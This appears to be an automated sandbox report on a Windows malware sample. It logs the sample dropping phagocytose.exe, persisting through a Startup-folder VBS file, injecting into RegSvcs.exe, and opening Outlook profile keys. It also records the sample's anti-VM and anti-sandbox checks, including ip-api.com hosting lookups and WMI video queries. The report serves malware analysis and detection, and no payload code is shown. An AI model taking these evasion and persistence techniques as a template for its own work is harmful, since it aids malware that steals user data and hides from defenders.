Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: phagocytose.exe, 00000002.00000003.1424365471.0000000003940000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000002.00000003.1421913115.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579623639.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579930343.0000000004100000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: phagocytose.exe, 00000002.00000003.1424365471.0000000003940000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000002.00000003.1421913115.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579623639.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579930343.0000000004100000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_008559E0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_008559E0

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0074C4C7 push A30074BAh; retn 0074h	0_2_0074C50D
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00768945 push ecx; ret	0_2_00768958
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E48945 push ecx; ret	2_2_00E48958
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E48945 push ecx; ret	6_2_00E48958

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

File created: C:\Users\user\AppData\Local\roundup\phagocytose.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs

Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_007448D7
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_007C5376
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00E248D7
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EA5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00EA5376
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	6_2_00E248D7
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EA5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	6_2_00EA5376

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00763187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00763187

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 4072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 1212, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	API/Special instruction interceptor: Address: 120AD4C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	API/Special instruction interceptor: Address: 1909B04

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: phagocytose.exe, 00000006.00000003.1547107089.0000000001784000.00000004.00000020.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000002.1584038662.0000000001826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXEQ
Source: phagocytose.exe, 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.00000000023F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 28uMwHvbTD.exe, 00000000.00000003.1359770182.0000000001372000.00000004.00000020.00020000.00000000.sdmp, 28uMwHvbTD.exe, 00000000.00000003.1359942423.0000000001372000.00000004.00000020.00020000.00000000.sdmp, 28uMwHvbTD.exe, 00000000.00000002.1396488235.0000000001372000.00000004.00000020.00020000.00000000.sdmp, phagocytose.exe, 00000002.00000002.1426610505.0000000001245000.00000004.00000020.00020000.00000000.sdmp, phagocytose.exe, 00000002.00000003.1396270122.0000000001245000.00000004.00000020.00020000.00000000.sdmp, phagocytose.exe, 00000002.00000003.1396119168.00000000011DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599563	Jump to behavior
